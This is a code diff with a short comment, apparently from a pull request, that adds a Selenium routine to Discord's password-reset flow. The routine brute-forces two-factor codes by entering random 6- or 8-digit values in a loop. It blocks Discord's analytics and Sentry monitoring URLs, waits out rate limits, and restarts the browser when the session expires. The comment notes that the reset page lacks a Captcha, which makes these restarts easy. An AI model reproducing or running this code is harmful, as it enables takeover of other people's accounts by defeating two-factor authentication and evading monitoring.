src/main.py

```diff
@@ -103,15 +110,141 @@ def main():
+				# If the TOTP login field is not found (e.g the user hasn't completed the Captcha, then try again
+		except (NoSuchElementException):
+			pass
+
+
+def reset(gen):
+	# Get the Chromium web driver and make it headless
+	options = Options()
+	options.add_argument('--headless')
+	options.add_argument('--disable-gpu')
+	driver = webdriver.Chrome(ChromeDriverManager().install(), options = options)
+	#Blocking cloudflare, sentry.io and discord science URLS (analytics and monitoring URLS)
+	driver.execute_cdp_cmd('Network.setBlockedURLs', {
+		"urls": [
+			"a.nel.cloudflare.com/report", 
+			"https://discord.com/api/v9/science",
+			"sentry.io"
+		]
+	})
+	# Enable the network connectivity of the browser
+	driver.execute_cdp_cmd('Network.enable', {})
+	# Go to the discord login page
+	driver.get("https://discord.com/reset#token=" + token) 
+	# Set up the statistics variables
+	totpCount = 0
+	ratelimitCount = 0
+
+	# Set the password variable from the environment variables
+	loginPassword = driver.find_element(by=By.NAME, value="password")
+	loginPassword.send_keys(newpassword)
+	loginPassword.send_keys(Keys.RETURN)
+
+	# Set the ammount of charaters to backspace from previously entered TOTP code.
+	if gen == genBackup:
+		clear = 9
+	else:
+		clear = 6
+
+	# Constantly run the script
+	while (True):
+
+		# Attempt to find the TOTP login field
+		try:
+			loginTOTP = driver.find_element(by=By.XPATH, value="/html/body/div[2]/div[2]/div[1]/div[1]/div/div/div/form/div[2]/div[2]/div/div/input")
+			time.sleep(0.5)
+			start = time.time()
+			sleepy = 0
+
+			#Logic to continuously enter OTP codes
+			while (True):
+
+				# Generate a new 8 or 6 digit number and enter it into the TOTP field
+				totp = gen(1)
+				loginTOTP.send_keys(totp)
+				loginTOTP.send_keys(Keys.RETURN)
+				totpCount += 1
+
+				#Test if Discord ratelimits us
+				if ("The resource is being rate limited." in driver.page_source):
+					# Log the ratelimit event and wait 10-20 seconds randomly
+					print(toColor("Ratelimited.", "yellow"))
+					sleepy = secrets.choice(range(10, 20))
+					ratelimitCount += 1
+
+				# This means that Discord has expired this login session.
+				elif ("Invalid two-factor auth ticket" in driver.page_source):
+					# This means that Discord has expired this login session.
+					#  Print this out as well as some statistics, and prompt the user to retry.
+					elapsed = time.time() - start
+					print(toColor("Invalid session ticket. The Discord login session has expired, try to run the program again.", "red"))
+					print(toColor(f"Number of tried codes this session: {totpCount}", "blue"))
+					print(toColor(f"Time elapsed for codes: {elapsed}", "blue"))
+					print(toColor(f"Number of ratelimits this session: {ratelimitCount}", "blue"))
+					# Close the browser.
+					driver.close()
+					time.sleep(1)
+					# Restart and reopen the browser.
+					reset(gen)

```

Comment:
The password reset page doesn't require any user input such as a Captcha so I found it useful to just close the browser and reopen.